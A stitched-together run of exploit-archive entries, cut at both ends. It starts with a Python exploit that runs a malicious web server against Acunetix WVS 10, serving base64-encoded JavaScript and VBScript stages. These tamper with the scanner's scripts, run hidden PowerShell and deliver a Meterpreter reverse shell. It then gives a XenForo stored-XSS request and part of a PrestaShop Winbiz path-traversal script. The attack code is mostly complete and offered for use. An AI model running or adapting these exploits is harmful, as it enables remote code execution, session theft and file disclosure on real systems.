"a8eb6d579e1e2ae0800000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000002c3000000000000000000000543000003830000000000000000000000000000000000000000000000000000" \
"040300000000000000000000040300000000000009c004578697450726f63657373000000003000004b45524e454c3" \
"3322e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"17aa9f565fccd8ce423701840cda9828320ce06749de816ae27196bce0849d1b494f89ffd49"
# param CMD => PAYLOAD_DOWNLOAD_EXEC
EXPLOIT_STAGE_1 = "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+d2luZG93LmFsZXJ0ID0genl4O3dpbmRvdy5wcm9tcHQgPSB6eXg7d" \
"2luZG93LmNvbmZpcm0gPSB6eXg7d2luZG93LmNhbGxlZCA9IDA7ZnVuY3Rpb24genl4KCl7d2luZG93LmNhbGxlZCA9IDE7dm" \
"FyIHh5ej0iJXMiO2V2YWwoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuIGMudG9TdHJpbmcoMzY" \
"pfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2MudG9TdHJpbmcoYSldPWtbY118fGMudG9TdHJp" \
"bmcoYSl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlK" \
"GMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybi" \
"BwfSgnNSAwPTYgNCgiMy4xIik7MC4yKFwnNyAvOCBkIC9lICIiICJjIiAtYiA5IC1hICJmIlwnKTsnLDE2LDE2LCdceDczXHg" \
"2OFx4NjVceDZjXHg2Y3xceDUzXHg2OFx4NjVceDZjXHg2Y3xceDcyXHg3NVx4NmV8XHg1N1x4NTNceDYzXHg3Mlx4NjlceDcw" \
"XHg3NHxceDQxXHg2M1x4NzRceDY5XHg3Nlx4NjVceDU4XHg0Zlx4NjJceDZhXHg2NVx4NjNceDc0fHZhcnxuZXd8XHg2M1x4N" \
"mRceDY0fEN8Tm9ybWFsfFx4NjVceDZlXHg2M1x4NmZceDY0XHg2NVx4NjRceDYzXHg2Zlx4NmRceDZkXHg2MVx4NmVceDY0fH" \
"dpbmRvd1x4NzNceDc0XHg3OVx4NmNceDY1fFx4NzBceDZmXHg3N1x4NjVceDcyXHg3M1x4NjhceDY1XHg2Y1x4NmN8XHg3M1x" \
"4NzRceDQxXHg1Mlx4NzR8QnwkJCcucmVwbGFjZSgiJCQiLHh5eikuc3BsaXQoJ3wnKSwwLHt9KSk7ZG9jdW1lbnQuYm9keS5p" \
"bm5lckhUTUw9JzQwNCBOb3QgZm91bmQnO308L3NjcmlwdD4lczxzY3JpcHQ+aWYgKHdpbmRvdy5jYWxsZWQgPT0gMCl7enl4K" \
"Ck7fTwvc2NyaXB0PjwvYm9keT48L2h0bWw+"
LOGIN_FORM = "PHN0eWxlPg0KYm9keXsNCiAgbWFyZ2luOiAwcHg7DQogIHBhZGRpbmc6IDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCn0NCg" \
"0KaDF7DQogIGNvbG9yOiAjZmZmOw0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDsNCiAgZm9udC13Z" \
"WlnaHQ6IG5vcm1hbDsNCiAgbWFyZ2luOiAyZW0gYXV0byAwcHg7DQp9DQoub3V0ZXItc2NyZWVuew0KICBiYWNrZ3JvdW5kOiAjMTMy" \
"MDJjOw0KICB3aWR0aDogOTAwcHg7DQogIGhlaWdodDogNTQwcHg7DQogIG1hcmdpbjogNTBweCBhdXRvOw0KICBib3JkZXItcmFkaXV" \
"zOiAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6IDIwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMjBweDsNCiAgcG9zaXR" \
"pb246IHJlbGF0aXZlOw0KICBwYWRkaW5nLXRvcDogMzVweDsNCn0NCg0KLm91dGVyLXNjcmVlbjpiZWZvcmV7DQogIGNvbnRlbnQ6IC" \
"IiOw0KICBiYWNrZ3JvdW5kOiAjM2U0YTUzOw0KICBib3JkZXItcmFkaXVzOiA1MHB4Ow0KICBwb3NpdGlvbjogYWJzb2x1dGU7DQogI" \
"GJvdHRvbTogMjBweDsNCiAgbGVmdDogMHB4Ow0KICByaWdodDogMHB4Ow0KICBtYXJnaW46IGF1dG87DQogIHotaW5kZXg6IDk5OTk" \
"7DQogIHdpZHRoOiA1MHB4Ow0KICBoZWlnaHQ6IDUwcHg7DQp9DQoub3V0ZXItc2NyZWVuOmFmdGVyew0KICBjb250ZW50OiAiIjsNCi" \
"AgYmFja2dyb3VuZDogI2VjZjBmMTsNCiAgd2lkdGg6IDkwMHB4Ow0KICBoZWlnaHQ6IDg4cHg7DQogIHBvc2l0aW9uOiBhYnNvbHV0Z" \
"TsNCiAgYm90dG9tOiAwcHg7DQogIGJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6" \
"IDBweCAwcHggMjBweCAyMHB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KfQ0KDQouc3RhbmR" \
"7DQogIHBvc2l0aW9uOiByZWxhdGl2ZTsgIA0KfQ0KDQouc3RhbmQ6YmVmb3Jlew0KICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IG" \
"Fic29sdXRlOw0KICBib3R0b206IC0xNTBweDsNCiAgYm9yZGVyLWJvdHRvbTogMTUwcHggc29saWQgI2JkYzNjNzsNCiAgYm9yZGVyL" \
"WxlZnQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvcmRlci1yaWdodDogMzBweCBzb2xpZCB0cmFuc3BhcmVudDsNCiAgd2lkd" \
"Gg6IDIwMHB4Ow0KICBsZWZ0OiAwcHg7DQogIHJpZ2h0OiAwcHg7DQogIG1hcmdpbjogYXV0bzsNCn0NCg0KLnN0YW5kOmFmdGVyew0K" \
"ICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IGFic29sdXRlOw0KICB3aWR0aDogMjYwcHg7DQogIGxlZnQ6IDBweDsNCiAgcmlnaHQ6" \
"IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItYm90dG9tOiAzMHB4IHNvbGlkICNiZGMzYzc7DQogIGJvcmRlci1sZWZ0OiA" \
"zMHB4IHNvbGlkIHRyYW5zcGFyZW50Ow0KICBib3JkZXItcmlnaHQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvdHRvbTogLT" \
"E4MHB4Ow0KICBib3gtc2hhZG93OiAwcHggNHB4IDBweCAjN2U3ZTdlDQp9DQoNCi5pbm5lci1zY3JlZW57DQogIHdpZHRoOiA4MDBwe" \
"DsNCiAgaGVpZ2h0OiAzNDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgbWFyZ2luOiAwcHggYXV0bzsNCiAgcGFkZGluZy10" \
"b3A6IDgwcHg7DQp9DQoNCi5mb3Jtew0KICB3aWR0aDogNDAwcHg7DQogIGhlaWdodDogMjMwcHg7DQogIGJhY2tncm91bmQ6ICNlZGV" \
"mZjE7DQogIG1hcmdpbjogMHB4IGF1dG87DQogIHBhZGRpbmctdG9wOiAyMHB4Ow0KICBib3JkZXItcmFkaXVzOiAxMHB4Ow0KICAtbW" \
"96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMTBweDsNCn0NCg0KaW5wdXRbdHlwZT0idGV4d" \
"CJdew0KICBkaXNwbGF5OiBibG9jazsNCiAgd2lkdGg6IDMwOXB4Ow0KICBoZWlnaHQ6IDM1cHg7DQogIG1hcmdpbjogMTVweCBhdXRv" \
"Ow0KICBiYWNrZ3JvdW5kOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgcGFkZGluZzogNXB4Ow0KICBmb250LXNpemU6IDE2cHg7DQo" \
"gICBib3JkZXI6IDJweCBzb2xpZCAjZmZmOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBib3JkZXItcmFkaXVzOiA1cH" \
"g7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCn0NCg0KaW5wdXRbdHlwZ" \
"T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \
"aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \
"jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \
"FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \
"dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \
"CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \
"NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \
"Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \
"G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \
"tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \
"VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \
"CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \
"ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \
"mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \
"IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \
"HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \
"ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \
"2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg=="
# param NO
EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \
"RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \
"iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \
"FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \
"cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \
"iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \
"0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \
"0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \
"D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \
"6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \
"HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \
"9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \
"nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \
"yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \
"CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \
"HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \
"D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \
"oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \
"l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \
"0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \
"211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \
"MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \
"iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \
"TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \
"CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \
"udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \
"hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \
"IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \
"wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \
"d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \
"RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \
"dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \
"pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \
"clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \
"xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \
"ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \
"I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \
"IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \
"IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \
"IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \
"Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \
"Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \
"BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \
"b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \
"I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \
"LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \
"RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \
"b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \
"1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \
"c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \
"F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \
"LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA=="
class myHandler(BaseHTTPRequestHandler):
timeout = 5
server_version = "Apache"
sys_version = "1.2"
def log_message(self, format, *args):
try:
paths = str(list(args)[0])
if "prompt" in paths or "confirm" in paths or "alert" in paths:
print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \
(len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1))
if "stage2" in paths:
print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" % len(EXPLOIT_STAGE_2)
return
except:
pass
return
def do_POST(self):
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
data = self.rfile.read(int(self.headers.getheader("Content-Length")))
data = data.split("&")
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
for param in data:
if "usr" in param:
param = param.split("=")[1]
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
("Bad password for user %s , <a href=\"/\">try again</a>." % param)))
return
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
"Some data are missing , <a href=\"/\">try again</a>."))
return
def do_GET(self):
try:
if self.path == "/":
self.send_response(302)
self.send_header('Content-type', 'text/html')
self.send_header('Location', "login")
self.end_headers()
# Send the html message
self.wfile.write("<a href='/?url=test'>Here</a>")
return
elif self.path == "/stage2":
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Send the html message
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2)
% (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%"))
postexpthread = Thread(target=postexploitation, args=(self.client_address[0], ))
postexpthread.start()
return
else:
string = ""
try:
string = self.path.split("=")[1]
except:
pass
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Send the html message
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM)))
return
except Exception as e:
print e.message
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("")
return
if __name__ == "__main__":
print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \
"Payload: Meterpreter reverse TCP 4444"
try:
if len(sys.argv) > 2:
# Create a web server and define the handler to manage the
# incoming request
server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler)
print 'Exploit started on port *:%s' % sys.argv[1]
print '[+] Waiting for scanner...'
# Wait forever for incoming http requests
server.serve_forever()
else:
print "Usage: %s <port> <local ip/domain name>" % os.path.basename(sys.argv[0])
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------
Requests
POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"
<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"
/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"
json
-----------------------------333176689514537912041638543422--
Response: After it is created, an alert comes immediately.
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198
import requests
import string
import random
# The base URL of the vulnerable site
base_url = "http://example.com"
# The URL of the login page
login_url = base_url + "/authentication.php"
# The username and password for the admin account
username = "admin"
password = "password123"
# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"
# The ID of the order to download
order_id = 1234
# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id
# The session cookies to use for the requests
session_cookies = None
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)
# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
